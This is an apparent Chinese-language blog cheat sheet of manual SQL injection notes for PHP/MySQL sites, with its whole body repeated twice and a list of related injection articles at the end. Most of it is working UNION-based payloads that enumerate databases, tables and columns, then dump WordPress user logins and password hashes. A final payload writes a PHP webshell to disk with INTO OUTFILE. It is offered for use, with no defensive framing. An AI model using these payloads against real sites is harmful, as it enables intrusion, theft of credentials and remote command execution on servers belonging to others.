php手工注入笔记
2012-07-22 22:08
239 查看
PHP内置函数:
1:system_user() 系统用户名
2:user() 用户名
3:current_user 当前用户名
4:session_user()连接数据库的用户名
5:database() 数据库名
6:version() MYSQL数据库版本
7:load_file() MYSQL读取本地文件的函数
8:@@datadir 读取数据库路径
9:@@basedir MYSQL
安装路径
10:@@version_compile_os 操作系统
===========================================================================
爆信息:
and 1=2 union select group_concat(user(),0x7c,database(),0x7c,version())--
============================================================================
1,爆库
and 1=2 union select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA --
2,爆表
and 1=2 union select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=0x776f72647072657373--
3,爆字段
and 1=2 union select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_name=0x77705f7573657273--
4,爆密码
and 1=2 union select group_concat(user_login,0x7c,user_pass) from wordpress.wp_users--
=============================================================================
load_file()
select ‘<?php eval_r($_POST[cmd])?>' into outfile '物理路径'
1:system_user() 系统用户名
2:user() 用户名
3:current_user 当前用户名
4:session_user()连接数据库的用户名
5:database() 数据库名
6:version() MYSQL数据库版本
7:load_file() MYSQL读取本地文件的函数
8:@@datadir 读取数据库路径
9:@@basedir MYSQL
安装路径
10:@@version_compile_os 操作系统
===========================================================================
爆信息:
and 1=2 union select group_concat(user(),0x7c,database(),0x7c,version())--
============================================================================
1,爆库
and 1=2 union select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA --
2,爆表
and 1=2 union select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=0x776f72647072657373--
3,爆字段
and 1=2 union select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_name=0x77705f7573657273--
4,爆密码
and 1=2 union select group_concat(user_login,0x7c,user_pass) from wordpress.wp_users--
=============================================================================
load_file()
select ‘<?php eval_r($_POST[cmd])?>' into outfile '物理路径'
相关文章推荐
- php―mysql 5.0以上手工注入实战
- access手工注入笔记
- php手工注入拿webshell
- 我的学习笔记(SQL简单的注入)(1) 手工注入以及注入一些常用语句
- ACCESS手工注入学习笔记
- 教程是php手工注入
- 手工PHP注入详解
- PHP+MySQL 手工注入语句
- PHP代码审计笔记--SQL注入
- PHP+MySQL 手工注入语句
- SQL server手工注入学习笔记
- PHP+MySQL 手工注入语句大全
- 记一次php手工注入(mysql)
- 学习笔记 MSSQL显错手工注入
- PHP手工注入
- PHP+MySQL 手工注入语句大全
- mysql-php基于“错误”的手工注入----(select *)
- PHP+MySQL环境下的SQL手工注入教程
- 手工php注入总结
- PHP+MySQL 手工注入语句大全 推荐